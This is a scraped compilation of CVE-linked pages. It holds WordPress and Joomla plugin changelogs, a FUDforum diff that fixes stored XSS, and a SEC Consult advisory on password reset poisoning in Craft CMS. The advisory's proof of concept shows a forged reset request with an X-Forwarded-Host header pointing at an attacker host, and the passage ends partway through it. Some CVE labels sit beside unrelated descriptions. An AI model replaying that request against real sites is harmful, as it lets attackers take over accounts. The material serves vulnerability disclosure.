Pro Features Lock Bypass vulnerability in Countdown & Clock plugin <= 2.3.2 at WordPress.

*   Details
*   Reviews
*   Installation
*   Development

Countdown builder – Customizable Countdown Timer  
A very simple plugin to add **countdown** timer to your website.  
**Countdown** timer allow you to create nice and functional Countdown timer just in a few minutes.  
This is the best way to create beautiful **Countdown** for your users.  
You can use our Countdown timer in your posts/pages via shortcode example like this  
\[ycd\_countdown id=73\]

Countdown types

*   Circle Countdown
*   Digital
*   Timer Countdown
*   Clock 1
*   Clock 2
*   Clock 3
*   Clock 4
*   Clock 5
*   Clock 6
*   Clock 7
*   Simple countdown
*   Sticky Countdown
*   Circle countdown & popup
*   Flipclock countdown
*   Flipclock countdown & popup
*   WooCommerce countdown
*   WooCommerce coupons
*   Coming Soon page

How to create Countdown example

We do web development and if you need a developer or if you think you have found a bug in Read more plugin, if you have any question, please feel free to contact us by this email adamskaat1@gmail.com.

1.  Upload the ‘Countdown’ plugin folder to the ‘/wp-content/plugins/’ directory.
2.  Activate the “countdown-builder” list plugin through the ‘Plugins’ menu in WordPress.
3.  Check the Countdowns Menu button and start adding Countdown.

**How can I insert it into my pages/posts**

After you installed the plugin you can go to your pages/posts and just click on our plugin shortcode button and add it to your pages/posts.

Yes you can, we have Circle and Flipclock countdown popups.

**What files I need to upload for installing the plugin**

You need to select the .zip file, there is no need to extract the zip file, just upload it.

I am a web designer and marketer from Bulgaria. I have been working in these specialties for 20 years now, and I have enough experience to determine the professional level of any Internet software creator, as well as their efficiency, responsiveness and honesty. I am extremely happy to find not only the 'Countdown & Clock' software, but also the manufacturing company. If there were more such manufacturers, the world would be a paradise for people from every country. I thank them. Toni

Es justo lo que necesitaba

I wanted a simple way to count down various milestones in my journey and this plugin was perfect for me. It's very easy to use and has plenty of customizations, even without paying anything.

Easy to install, easy to use, works perfectly well.

So simple and helpful plugin! Thank you so much!

Read all 162 reviews

“Countdown, Coming Soon, Maintenance – Countdown & Clock” is open source software. The following people have contributed to this plugin.

Contributors

*    adamskaat

**2.5.8**

*   Added Countdown Expiration WooCommerce Condition “The cart will not empty the countdown”

**2.5.7**

*   Added Simple countdown translation
*   Added disable google fonts option

**2.5.6**

*   Changed the default value of the Countdown Expiration WooCommerce Condition
*   Fixed PHP warnings

**2.5.5**

*   Fixed flip clock popup open onload
*   Added info tooltip text to describe feature

**2.5.4**

*   Added display rules post categories detection
*   Improved display rules WooCommerce label
*   Added display rules for all custom posts categories detection
*   Added display rile for WooCommerce Shop page detection
*   Added display rile for WooCommerce Cart page detection
*   Added display rile for WooCommerce Account page detection

**2.5.3**

*   Added Countdown fixed position

**2.5.2**

*   Added Sticky Countdown ” Enable sticky footer ” option
*   Added WooCommerce Number of products sold
*   Fixed WooCommerce coupon date issue

**2.5.1**

*   Added WooCommerce Number of products less than
*   Added WooCommerce Number of products more than
*   Code improvement

**2.5.0**

*   Added display rule All tags
*   Added display rule Selected tags
*   Admin panel UI improvements
*   Fixed Display rule pages search
*   Minor bug fixes and improvements

**2.4.9**

*   Added Countdown Expiration WooCommerce Condition (Stock is empty)
*   Added Countdown Expiration WooCommerce Condition (Stock is not empty)
*   Improved general options section
*   Improved Display rule condition

**2.4.8**

*   Fixed Simple countdown expiration default behavior
*   Fixed Simple countdown timer preview issue during duration change

**2.4.7**

*   Fixed Countdown translation warnings
*   Improved Display Rules section
*   Added page type Home, Posts, Search, 404, Archive

**2.4.6**

*   Fixed coming soon mode option
*   Fixed coming soon page render html tags issue

**2.4.5**

*   Added Display Rules new section
*   Added possibility to from settings include (Timer Countdown, Clock 1, Clock 2, Clock 3, Clock 4, Clock 5, Clock 6, Clock 7) types
*   Added New feature suggestion request section
*   Fixed some warnings

**2.4.4**

*   Countdown Admin panel fixes

**2.4.3**

*   Added possibility to translate the circle countdown texts related to browser language.

**2.4.2**

*   Sticky Countdown Double Digits option

**2.4.1**

*   Added Years possibility to simple countdown

**2.4.0**

*   Fixed Clock1 options
*   Fixed Clock2 options
*   Fixed Clock3 options
*   Fixed Coming Soon options
*   Fixed Countdown button options
*   Bug fixed types section

**2.3.5**

*   Fixed moment js file

**2.3.4**

*   Code fixes

**2.3.3**

*   Code fixes

**2.3.2**

*   Added Simple countdown numbers margin
*   Added Simple countdown text margin

**2.3.1**

*   Simple countdown added Text to top (new)
*   Sticky countdown close button text position change possibility (new)

**2.3.0**

*   Added compatibility with Polylang

**2.2.9.2**

*   Fixed Display on save issue

**2.2.9.1**

*   Fixed some warnings
*   Fixed issue on PHP 8
*   Code improvement

**2.2.9**

*   Security improvement
*   Fixed onclick Countdown popup issue

**2.2.8**

*   Fixed Simple countdown save duration option
*   Fixed Sticky countdown save duration option
*   Fixed countdown preview box height limitation issue

**2.2.7**

*   Hide Editor Media buttons (new settings)
*   Settings options save improvement

**2.2.6**

*   Added Enable date for the timers

**2.2.5**

*   Fixed simple countdown countUp issue
*   Fixed Days durations limitation

**2.2.4**

*   Added Countdown Enable start date (New)
*   Added Clocks Background color change possibility.
*   Fixed Security issue during countdowns clone

**2.2.3**

*   Bug fixed of the Countdown Gutenberg block
*   Countdown Gutenberg block improvements

**2.2.2**

*   Added Custom font family functionality
*   Fixed the progress bar color change issue
*   Fixed the progress bar percentage calculation issue
*   Fixed schedules date calculation with simple countdown type

**2.2.1**

*   Fixed Change countdown before text after expiration saving issue
*   Fixed Change countdown before text before expiration saving issue

**2.2.0**

*   Fixed debricated function and compatible with the PHP 8

**2.1.9**

*   Fixed Change countdown before text after expiration during count up
*   Fixed Change countdown after text after expiration during count up
*   Fixed coming soon warnings

**2.1.8**

*   Change countdown before text after expiration
*   Change countdown after text after expiration

**2.1.7**

*   Upcoming Day Of Week (Recurring) (New Feature)

**2.1.6.1**

*   Time zone bug fixed

**2.1.6**

*   Time zone per user functionality

**2.1.5**

*   Sticky Countdown Button close banner behavior
*   Sticky countdown admin side improvement

**2.1.4**

*   Sticky button copy alert after copy

**2.1.3**

*   Added possibility via Sticky countdown button copy text

**2.1.2**

*   Added security for settings save
*   Support menu fixed

**2.1.1**

*   Fixed simple countdown date calculation issue
*   Fixed schedule issue

**2.1.0**

*   Added simple countdown months new time unite

**2.0.9**

*   Fixed Display on option save issue on PHP 8
*   Fixed Coming Soon issue for logged in users on PHP 8
*   Duration live preview issue Circle and Simple countdowns

**2.0.8**

*   Coming soon Automatically start by date
*   Coming soon Automatically expire by date
*   Coming soon admin section improvement

**2.0.7**

*   Added possibility add shortcode inside Coming soon page content
*   Fixed added slashes issue in coming soon page content
*   Added random number plugin to more plugins section

**2.0.6**

*   Fixed Simple Countdown tyoe count up functionality

**2.0.5**

*   Fixed Simple Countdown type after expiration issue
*   Fixed Simple Countdown type responsiveness issue
*   Fixed Admin side live preview box dragable issue
*   Fixed Simple Countdown And Subscription type issue
*   Fixed Simple Countdown type dots font size issue

**2.0.4**

*   Multiple Simple countdowns dates confilict fixed

**2.0.3**

*   Simple countdown double digits

**2.0.2**

*   Simple countdown live preview labels on/off issue fixed
*   Code improvement related to WordPress 5.7

**2.0.1**

*   Simple countdown display on pages option fixed

**2.0.0**

*   Nav bar on the Countdown types section
*   Show on selected user roles (Coming Soon option)
*   Schedule 1 option bug fixed
*   Code optimization
*   Code clean up

**1.9.9**

*   Fixed countdown activation issue
*   Fixed circle countdown
*   Countdown admin panel options label typo fixes

**1.9.8**

*   Simple countdown Numbers Color
*   Simple countdown Labels Color
*   Simple countdown Numbers Font Family
*   Simple countdown Labels Font Family
*   Admin side improvements

**1.9.7**

*   Fixed simple countdown issue on Safari browser

**1.9.6**

*   Simple countdown numbers font size
*   Simple countdown labels font size

**1.9.5**

*   Simple Countdown type live preview improvement
*   Fixed Sticky Countdown issue on Iphone devices
*   Improved Date Time Picker

**1.9.4**

*   Simple countdown new type

**1.9.3**

*   Added ‘ Print scripts to the page ‘ option in the Setting section
*   WordPress 5.6 version full support

**1.9.2**

*   Added possibility close Sticky Countdown
*   Added possibility to change Sticky Countdown close text
*   Admin side type sections improvement

**1.9.1**

*   Sticky Countdown Sections Order

**1.9.0**

*   Inside Sticky Countdown type, added possibility select another countdown type to show countdown
*   Coming Soon type code improvements

**1.8.9**

*   Added Demo website
*   Improved deactivation survey
*   Fixed Timer countdown buttons issue
*   Schedule countdown bug fixed
*   Sticky countdown bug fixed

**1.8.8**

*   Deactivation survey

**1.8.7**

*   Create default countdown after the first activation
*   Bug fixes

**1.8.6**

*   Timer Before HTML
*   Timer After HTML
*   Compatibility test with WordPress 5.5 version

**1.8.5**

*   Countdown Widget Title Change
*   Countdown Settings Save Message
*   Coming Soon setting Save Message

**1.8.4**

*   Moment js lib customization and prevent conflict with other plugins
*   Colors Rgba possibility
*   Coming soon IP whitelist feature
*   Code improvements

**1.8.3**

*   Sticky Countdown expiration time bug fixed
*   After activation redirect to plugin menu section
*   Countdowns types section improvement

**1.8.2**

*   Timer countdown enable labels
*   Timer countdown labels font size

**1.8.1**

*   Sticky countdown button redirect to new tab option

**1.8.0**

*   Add sticky countdown to version
*   WooCommerce coupon integration

**1.7.9**

*   Admin side fixed Warnings

**1.7.8**

*   Admin side improvements

**1.7.7**

*   Circle time extension
*   Admin side hide coming soon menu setting
*   Admin side info metabox
*   Sticky countdown type improvements
*   WooCommerce countdown type improvements
*   Bug fixes

**1.7.6**

*   Countdown Clone (new)
*   Coming Soon Custom JS (new)
*   Coming Soon Custom CSS (new)
*   Circle Timer (coming soon)

**1.7.5**

*   New Maintenance mode (new)
*   Timer days option (new)
*   Support metabox coming soon section
*   Bug fixes

**1.7.4**

*   Timer start button Custom class name (new)
*   Timer reset button Custom class name (new)
*   Timer AutoPlay after restart (new)

**1.7.3**

*   Fixed Saved duration issue related to Days
*   Reset duration (new)

**1.7.2**

*   Countdown timer milliseconds (new)

**1.7.1**

*   Add duration Days option (new)
*   Schedule 2 (new)
*   Admin side improvement

**1.7.0**

*   Save Duration For Each User (new)
*   Admin Side Is Expired Bug Fixed
*   Circle Countdown Popup Saving Issue Fixed
*   Bug Fixed Related To Schedule Countdown

**1.6.9**

*   Save Duration (new)
*   Code optimization

**1.6.8**

*   Circle countdown text margin top (new)
*   Circle countdown numbers margin top (new)
*   Coming Soon Background Video (new)

**1.6.7**

*   Countdown Shortcode metabox (new)
*   Admin Design improvement

**1.6.6**

*   Circle Countdown switch Number And Text (new)

**1.6.5**

*   Coming Soon add Countdown (new)
*   Coming Soon Headline Color (new)
*   Coming Soon Message Color (new)
*   Coming Soon Font Family (new)

**1.6.4**

*   Coming Soon new menu type(new)
*   Coming Soon background color(new)
*   Coming Soon background image(new)
*   Count up bug fixed

**1.6.3**

*   Coming Soon Header Title (new)
*   Coming Soon SEO Meta Description (new)
*   Coming Soon Favicon (new)

**1.6.2**

*   Coming Soon Page (new)

**1.6.1**

*   Shortcode Date attribute \[ycd\_countdown id=63 date=”2019-11-25 22:25″\]
*   JS custom trigger YcdExpired

**1.6.0**

*   Due date bug fixed
*   New Video tutorials section
*   Countdown Number Styles Font Size option improvement

**1.5.9**

*   Countdowns table copy shortcode
*   New Ideas sub menu
*   Admin side improvements
*   Countdown Button new features and video example
*   Bug fixed

**1.5.8**

*   Custom JS (new)
*   Circle countdown Redirect to new tab (new)
*   Countdown button new options
*   Bug fixed

**1.5.7**

*   Font load issue
*   Countdown button extension
*   Code optimization

**1.5.6**

*   Count up from End Date (new)
*   Admin panel improvements

**1.5.5**

*   More plugins section
*   Count Up option save bug fixed

**1.5.4**

*   Code improvement (added new actions and triggers)
*   Analytic Extension
*   Bug fixed

**1.5.3**

*   Timer reset button
*   Timer buttons colors customization
*   Circle countdown popup on load event
*   Flipclock countdown popup on load event

**1.5.2**

*   Enable Timer Button (new)
*   Enable/Disable auto counting
*   Timer button start label
*   Timer button stop label

**1.5.1**

*   Display countdown on all custom post
*   Display countdown on selected custom post
*   Code optimization
*   Backend functions improvement
*   Bug fixed

**1.5.0**

*   Clock 3 type improvement
*   Bug fixed

**1.4.9**

*   Clock mode (12h/24h)
*   But fixed

**1.4.8**

*   After expire behavior for the Clock1, Clock2, Clock3, Clock4, Clock5, Clock6, Clock7 timers

**1.4.7**

*   New timer feature for the Clock1, Clock2, Clock3, Clock4, Clock5, Clock6, Clock7
*   Bug fixed

**1.4.6**

*   Display Countdown to Everywhere automatically (new feature)
*   Circle Countdown responsiveness improvement

**1.4.5**

*   Countdown Showing Limitation (new feature)
*   Countdown Showing Animation (new feature)
*   Countdown Shadow (new feature)
*   Code optimization
*   Small bug fixed

**1.4.3**

*   After Countdown Expire: Count Up (new feature)
*   Countdown responsiveness improvement
*   Bug fixed

**1.4.2**

*   New custom Css code possibility
*   Features improvements
*   Code improvements

**1.4.1**

*   Before Circle countdown content (new feature)
*   After Circle countdown content (new feature)
*   bug fixed

**1.4.0.1**

*   Improve Countdown Support menu link
*   Change countdown menu title to Countdown & Clock
*   minor improvement

**1.4.0**

*   Live preview draggable and toggle improvement
*   Clock 1 new improvements
*   Clock 2 new improvements
*   Clock 3 new improvements
*   Clock 4 new improvements
*   Clock 5 new improvements
*   Clock 6 new improvements
*   Clock 7 new improvements
*   Minor bug fixed

**1.3.9**

*   Clock 1 colors customizations
*   Shortcode media button conflict fixed
*   Admin side bug fixed
*   Descriptions improvement

**1.3.8**

*   New progress bar option
*   Admin side text improvement
*   Bug fixed

**1.3.7**

*   Admin side improvement
*   Bug fixed

**1.3.6**

*   Gutenberg block (new)
*   HTML editor countdown button (new)
*   Schedule (new)
*   Backend side improvement
*   Bug fixed

**1.3.5**

*   Bug Fixed

**1.3.4**

*   Countdown date duration option(new)
*   WooCommerce Countdown (new)
*   Countdown create bug fixed
*   Countdown issue on iPhone
*   Code improvement

**1.3.3**

*   Circle countdown months and year support
*   Time zone change issue on the Internet Explorer
*   Sticky countdown type (new)
*   Countdowns table improvement
*   Code improvement

**1.3.2**

*   Added new clock 2 types (new)
*   Code optimization
*   Bug fixed

**1.3.1**

*   Add new type clock
*   Code improvement

**1.3.0**

*   Fixed possibility multiple timer on the same page

**1.2.9**

*   Newsletter (new)
*   Countdown number Font Size (new)
*   Countdown number Font Weight (new)
*   Countdown number Font Style (new)
*   Countdown number Font Family (new)
*   Video tutorial https://www.youtube.com/watch?v=efqVcdKF620
*   Bug fixed
*   Code fixes

**1.2.8**

*   Circle Countdown type text Font Style (new option)
*   Bug fixed

**1.2.7**

*   New Digital countdown type
*   Bug fixed
*   Code improvement

**1.2.6**

*   Fixed Compatibility with cache plugins
*   Bug fixed

**1.2.5**

*   Code optimization
*   Admin dashboard improvement
*   Flip Clock popup type PRO

**1.2.4**

*   Bug fixed
*   Code improvement
*   Subscription (form and subscribers section) PRO

**1.2.3**

*   Bug fixed

**1.2.2**

*   User Role section (new)
*   Countdown timer insert media button (new)
*   Countdown timer widget (new)
*   Countdown delete data option (new)
*   Timer End Sound (new)
*   Support menu tab (new)
*   show countdown for selected countries (new pro)
*   bug fixed
*   Code optimizations

**1.2.1**

*   Countdown responsiveness
*   Countdown alignment
*   Countdown On of logic
*   Hide on mobile devices (pro)
*   Show on mobile devices (pro)
*   Bug fixes
*   Code optimization

**1.2.0**

*   Shortcode view improvment
*   Bug fixed
*   Code optimization
*   Flip clock NEW countdown type (Pro)

**1.0.9**

*   Time Zone
*   Circle Countdown Popup type (Pro)
*   code improvement

**1.0.8**

*   Countdown padding
*   Start Angle
*   Font Size
*   Font Weight
*   Countdown padding
*   Font Family (PRO)
*   Countdown Days Text Color (PRO)
*   Countdown Hours Text Color (PRO)
*   Countdown Minutes Text Color (PRO)
*   Countdown Seconds Text Color (PRO)
*   Background Circle (PRO)
*   Background Image (PRO)

**1.0.6**

*   Circle Width
*   Background Width
*   Countdown Days Color (PRO)
*   Countdown Hours Color (PRO)
*   Countdown Minutes Color (PRO)
*   Countdown Seconds Color (PRO)
*   After Countdown Expire Default
*   After Countdown Expire Hide Countdown
*   After Countdown Expire Show Text (PRO)
*   After Countdown Expire Redirect To URL (PRO)
*   Bug fixed
*   Design fixed

**1.0.5**

*   Countdown live preview
*   js code optimization

**1.0.4**

*   Countdown background circle
*   Countdown direction
*   Countdown bug fixed

**1.0.3**

*   Countdown days on of logic
*   Countdown days text
*   Countdown hours on of logic
*   Countdown hours text
*   Countdown minutes on of logic
*   Countdown minutes text
*   Countdown seconds on of logic
*   Countdown seconds text
*   Countdown js code optimization
*   Countdown admin design improvement

**1.0.2**

*   Countdown width
*   Bug fixed

**1.0.1**

*   Countdown animation
*   Code improvement

**1.0**

*   Plugin publish

CVE-2022-29423: Countdown, Coming Soon, Maintenance – Countdown & Clock

Joomla Guru extension 5.2.5 is affected by: Insecure Permissions. The impact is: obtain sensitive information (remote). The component is: Access to private information and components, possibility to view other users' information. Information disclosure Access to private information and components, possibility to view other users' information.

**6.0.1**

**Bug Fixes**

*   Update guru config
*   Fix missing og (Open Graph) tag
*   Fix installer issue
*   Fix redactor editor when add question

**6.0.0 Stable**

**New Updates**

*   Joomla 4 support
*   Fully PHP8 support

**Improvements**

*   Course list layout: improved default view and new list view
*   Course detail layout: improved default view and new Modern view
*   Improved Lesson layout and support dark and light theme
*   All pages are improved for better layout & style
*   Improved responsive for all pages.
*   Back-end dashboard improvements
*   Social sharing and Open Graph
*   Bug fixes

View details

**6.0.0 Beta**

**New Updates**

*   Joomla 4 compatibility
*   Fully PHP8 support

**Improvements**

*   Improved design for all pages
*   New course list view - List view
*   New course detail view - Modern view
*   Lesson layout with dark and light theme
*   Back-end dashboard improvements

View details

**5.2.5**

**New payment plugins**

*   New Stripe SCA payment plugin
*   New PayPal Smart Payment Plugin

**Bug Fixes**

*   The sequential lesson cannot be selected
*   Fix 404 error when editing module on the frontend
*   Fix search (everything) error on frontend
*   The fix could not open page 2 on quiz results
*   Optimize workflow of adding a question to the quiz
*   Support Latest version of JW all videos plugin in Guru
*   Add zoom meeting media type
*   Complete course when teacher score essay
*   Fix outdated courses still shows on an author page
*   Fix save lesson error when kunena is installed
*   Show disabled payment methods on order list in the backend
*   Fix redirect login on multilingual didn’t keep the current language
*   Add search menu type for Guru
*   Fix exam score N/A on the certificate

View details

**5.2.4**

**Bug Fixes**

*   Student activation by super user
*   Fix override admin email when install
*   Sparate email enroll for teach and admin
*   Index database when install
*   Render sidebar when open modal
*   Fix missing jquery on yootheme
*   Fix uikit noconflict error with yoo theme
*   Increase size of media text
*   Change media column datatype to avoid media error
*   Fix duplicated id error
*   Invalid token when trying to see more than 20 uploaded projects by students
*   Remove unused parameters

**Improvements**

*   More option in Export data
*   Improve load speed guru backend

**5.2.3**

**Bug Fixes**

*   Promocode used for multiple times for the same user
*   Teachers - Students page load slowly
*   Promocode still able to used even before start date
*   Time bug when create order at backend
*   Prevent unlimited plan
*   Lessons not showing correctly when going through course
*   Status doesn't update on serial order lesson
*   Notice error on Teacher's student page
*   Course Manager: Can't filter Course by status
*   Some bugs in Media Library
*   Got error database when duplicate pending Course
*   Order Manager's toolbar need more styled

**New feature**

*   Add Student Chart Feature in Guru

**Improvement**

*   Send Purchase Email on Enroll

**5.2.2**

**Bug Fixes**

*   added new changes on preview certificate
*   fixed issue, user can access lessons/exercises when license expired
*   Fixed issue with Articulate SCORM
*   Fixed issue with multiple emails send to students
*   Bug: Guru students assigned to JS group as admin
*   Add media in course not working
*   Can not delete courses from cart

**Improvements**

*   How to create clickable image that expands into lightbox inside lessons
*   Uikit from 2.0 to 3.0
*   Option to show or not lesson status un course

**5.2.1**

**New features**

*   2Checkout Payment Plugin
*   Privacy for files
*   Guru – Events for JomSocial
*   Course review only by Super Admin

**Improvements**

*   Page title seo improvements
*   Free course should not show 00 in price
*   Add company Name value variable
*   Login Logout redirections
*   Collapsible menu for dashboard items
*   Allow admin to change the order of course
*   Display category of a course in "my courses" list
*   Translate Unlimited in courses
*   More option in Date formate
*   Close all' instead of '+Show all?

**Bug Fixes**

*   JCE editor layout issue on backend
*   Hide FB and Twiiter link in teacher profile

**5.2.0**

**New Features :**

*   Custom Certificate option
*   Login Redirection for Teachers
*   Icon control on certificate page
*   Editor support for Teachers
**Improvements :**

*   **Mask the password and secret key in PayPal Pro** : New update will mask the password and private key in papal payment plugin.
*   **Plugin support - System - User Actions Log** : User action log supported with Guru
*   **RTL Support for quiz** : RTL support added for quiz lesson in courses
*   **Certificate URL in Email** : Certificate URL added for certificate email (Student can view certificate via Email link )
*   **Add option to allow/disallow to delete their own course** : Admin can allow/disallow teachers to delete their own course, You can find these setting on Guru backend > Teacher setting are.
*   **Increase Quiz time** : Now you can add quiz timer from 1 to 150 mins or unlimited.
*   **Editor support for Essay in Quiz** : Essay type question support editor in quiz.
*   **Price with decimals** : Yen currency support.
*   **Course displays empty tab when there is no course description** : Content tab of the course will be default if there is no content in description of course.

**Bug Fixes :**

*   Quiz is not published but still run exam time
*   Lesson dropdown broken with PHP 7.2 Guru Light
*   Breadcrumb displays error on course detail page
*   Typing mistake on Custom guru url page
*   Shouldnt allow to create new course category with empty category name
*   Got error when create duplicate course category name
*   Category List Layout Layout options not working
*   Guru search module show same results
*   Teacher list page use double slash in images
*   Database Error in My Projects page
*   Can't pick color on custom certificate tab
*   Background color, Font are not working on certificate pdf
*   Got error when using MPDF for certificate page
*   Student can edit teacher's course with URL
*   Got notice error in dashboard page
*   End publishing date is not working
*   Guru Search Courses module displays error in RTL
*   Got notice error when create a lesson with scorm
*   Color picker displays wrong position

**5.1.18**

**New Feature**

*   Implement Projects Results in back-end
*   Add GURU custom fields for registration form
*   Data in time column
*   Guru and JomSocial Groups
*   SCORM Support

**Improvement**

*   Mask the password and secret key in Paypal pro
*   Lesson should be removed right after clicking on delete icon
*   Should not allow to create duplicate lesson
*   Update language for Continue button

**Bug Fix**

*   Missing order option in backend for queeze question in file
*   Got warning error while saving lesson
*   Got warning error when select quizze
*   Cant upload file on lesson with project layout
*   Got warning error on Course category page
*   Can not reorder questions
*   Got warning error on students list take the quiz
*   Got error when remove and reselect quiz
*   Got warning error when there is no quiz in a course
*   Create new quiz button is not working on the frontend
*   Tabs in Final exam are not actived
*   Filter by quizzes type is not working
*   \[Media\] Auto play video is not working
*   \[Media\] Media filter works incorrectly after saving media
*   \[Media\] Got notice error when select article media
*   \[Lesson\] Cant show all lesson, should add scrollbar when there are many lessons
*   \[Lesson\] Got warning error when select project for lesson
*   \[Media\] Cant edit audio on the frontend
*   \[Commissions\] Export function is not working
*   \[Fields\] Typing mistake on create new field form
*   \[Course\] Can not play audio when the lesson is loaded
*   \[Course\] Got error duplicate entry after edit a lesson
*   \[Quiz\] Can not add question for quiz on the frontend
*   \[Media\] Got warning error on media library page
*   \[Quiz\] Audio is displaying not nice on the quiz page
*   \[Custom field\] Got error message after saving custom field

CVE-2022-23802: Guru Change Log - Joomla LMS - LMS for Joomla eLearning

FUDforum 3.1.1 is vulnerable to Stored XSS.

@@ -1,6 +1,6 @@ <?php /\*\* \* copyright : (C) 2001-2021 Advanced Internet Designs Inc. \* copyright : (C) 2001-2022 Advanced Internet Designs Inc. \* email : forum@prohost.org \* $Id$ \* @@ -38,6 +38,13 @@ function validate\_email($email)  
function encode\_subject($text) { /\* HTML entities check. \*/ if (strpos($subj, '&') !== false) { $subj = html\_entity\_decode($subj); }  
$text = htmlspecialchars($text); // Prevent XSS like <img src="1" onerror="alert()"\>  
if (preg\_match('!\[\\x7f-\\xff\]!', $text)) { $text = '\=?{TEMPLATE: iemail\_CHARSET}?B?'. base64\_encode($text) .'?='; } @@ -51,11 +58,6 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) return 0; }  
/\* HTML entities check. \*/ if (strpos($subj, '&') !== false) { $subj = html\_entity\_decode($subj); }  
if ($header) { $header = "\\n" . str\_replace("\\r", '', $header); } @@ -66,11 +68,11 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) $addronly = preg\_replace('/.\*</', '<', $from); // RFC 2822 Return-Path: <...> $header = 'From: '. $from ."\\nReturn-Path: ". $addronly ."\\nUser-Agent: FUDforum/". $GLOBALS\['FORUM\_VERSION'\] . $extra\_header . $header;  
$subj = encode\_subject($subj); $body = str\_replace("\\r", '', $body); if ($munge\_newlines) { $body = str\_replace('\\n', "\\n", $body); } $subj = encode\_subject($subj);  
// Call PRE mail plugins. if (defined('plugins')) { @@ -90,7 +92,7 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) } $smtp = new fud\_smtp; $smtp\->msg = str\_replace(array('\\n', "\\n."), array("\\n", "\\n.."), $body); $smtp\->subject = encode\_subject($subj); $smtp\->subject = $subj; $smtp\->to = $to; $smtp\->from = $from; $smtp\->headers = $header;

CVE-2022-28545: Fix XSS vulnerability reported by ptsecurity.com (attacker tries to s… · fudforum/FUDforum@aed6966

Stored Cross-Site Scripting (XSS) vulnerability in Andrea Pernici News Sitemap for Google plugin <= 1.0.16 on WordPress, attackers must have contributor or higher user role.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of May 6, 2022 and is not available for download. This closure is temporary, pending a full review.

Hi, great plugin! Can you correct these warnings? Notice: Use of undefined constant WP\_Error - assumed 'WP\_Error' in /home/brusco/workspace/icon/wp-content/plugins/google-news-sitemap/apgnsm.php on line 174 Notice: Undefined variable: apgnsm\_active in /home/brusco/workspace/icon/wp-content/plugins/google-news-sitemap/apgnsm.php on line 184

Il plugin fa esattamente quello che promette, e lo fa in modo semplice e pulito. il solo "difetto" l'accesso alla configurazione anche agli autori e collaboratori

Read all 4 reviews

“Andrea Pernici News Sitemap for Google” is open source software. The following people have contributed to this plugin.

Contributors

*    Andrea Pernici

CVE-2021-36912: Andrea Pernici News Sitemap for Google

Craft CMS version 3.7.36 suffers from a password reset poisoning vulnerability. An unauthenticated attacker who knows valid email addresses or account names of Craft CMS backend users is able to manipulate the password reset functionality in a way that the registered users of the CMS receive password reset emails containing a malicious password reset link.

SEC Consult Vulnerability Lab Security Advisory < 20220505-0 >  
=======================================================================  
               title: Password Reset Poisoning Attack  
             product: Craft CMS  
  vulnerable version: 3.7.36 and potentially lower  
       fixed version: none, see workaround by vendor  
          CVE number: CVE-2022-29933  
              impact: high  
            homepage: https://craftcms.com  
               found: 2022-03-14  
                  by: Sandro Einfeldt (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Craft is a flexible, user-friendly CMS for creating custom digital  
experiences on the web and beyond.

It features:

- An intuitive, user-friendly control panel for content creation and  
   administrative tasks.  
- A clean-slate approach to content modeling and front-end development  
   that doesn’t make any assumptions about your content or how it should be  
   consumed.  
- A built-in Plugin Store with hundreds of free and commercial plugins,  
   all just a click away.  
- A robust framework for module and plugin development.  
- An active, vibrant community."

Source: https://craftcms.com/docs/3.x/

Business recommendation:  
------------------------  
The vendor responded that the vulnerability will not be fixed as a workaround  
is available.

An in-depth security analysis performed by security professionals is highly  
advised, as the software may be affected from further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Password Reset Poisoning Attack (CVE-2022-29933)  
The password reset function of the Craft CMS backend login page,  
usually accessible under https://<hostname>/index.php?p=admin/login,  
is vulnerable to a password reset poisoning attack. An unauthenticated  
attacker who knows valid email addresses or account names of Craft CMS  
backend users is able to manipulate the password reset functionality in  
a way that the registered users of the CMS receive password reset emails  
containing a malicious password reset link.

The link contains valid (secret) tokens in the URL's GET parameters that  
are necessary to authenticate against the server's password reset function  
and enable a user who lost or forgot the account's password to reset the  
password. By manipulating the password reset request, an attacker is able to  
set an arbitrary hostname in the resulting password reset link. Thereby, the  
attacker can set the link to point to an attacker-controlled host.  
If a user clicks on the reset link, the valid reset tokens in the GET  
parameters will be sent to the attacker's web server and can be  
extracted from the server logs. The attacker is able to build a valid  
password reset link by adding the tokens to the general reset link  
structure:

https://<hostname>/index.php?p=admin/set-password&code=<token1>&id=<token2>

If the attacker calls the filled out URL with a web browser, the  
attacker will be able to reset the account's password and log in.

Proof of concept:  
-----------------  
1) Password Reset Poisoning Attack (CVE-2022-29933)  
First, the attacker needs to browse the following URL:

https://<hostname>/index.php?p=admin/login

The login mask contains a link "Forgot your password?". Following this  
link, the attacker gets prompted to submit a valid account name or email  
address. After entering the account name or email address and pressing  
the "Reset Password" button, the attacker can intercept the resulting  
HTTP POST request with an intercepting web proxy (e.g. BurpSuite). The  
intercepted request can then be manipulated before getting forwarded  
to the server. The attacker needs to add the HTTP header

X-Forwarded-Host: <attacker_host>

while the value should contain the hostname of the webserver under the  
attacker's control.

Manipulated Request:  
-------------------------------------------------------------------------------  
POST /index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1  
Host: <IP>  
X-Forwarded-Host: www.attacker.com  
[...]  
Referer: http://<IP>/index.php?p=admin/login  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Registered-Asset-Bundles: ,craft\web\assets\login\[...]  
X-Registered-Js-Files: ,http://<IP>/cpresources/[...]  
X-CSRF-Token: c9kEDPROifmFNKSKhght_JgkBgnnk5EfXiH1qHA[...]  
X-Requested-With: XMLHttpRequest  
Content-Length: 38  
Origin: http://<IP>  
Connection: close  
Cookie: CRAFT_CSRF_TOKEN=[...]

loginName=test%40example.com  
-------------------------------------------------------------------------------

The resulting server response indicates that the request has been processed.

Response:  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Date: Mon, 14 Mar 2022 08:19:24 GMT  
[...]  
X-Powered-By: Craft CMS  
Content-Length: 16  
Connection: close  
Content-Type: application/json; charset=UTF-8

{"success":true}  
-------------------------------------------------------------------------------

The user will then receive a malicious password reset email pointing to the  
hostname that the attacker provided by adding the X-Forwarded-Host header.

Email:  
-------------------------------------------------------------------------------  
Hey Test,

To reset your Test Install password, click on this link:

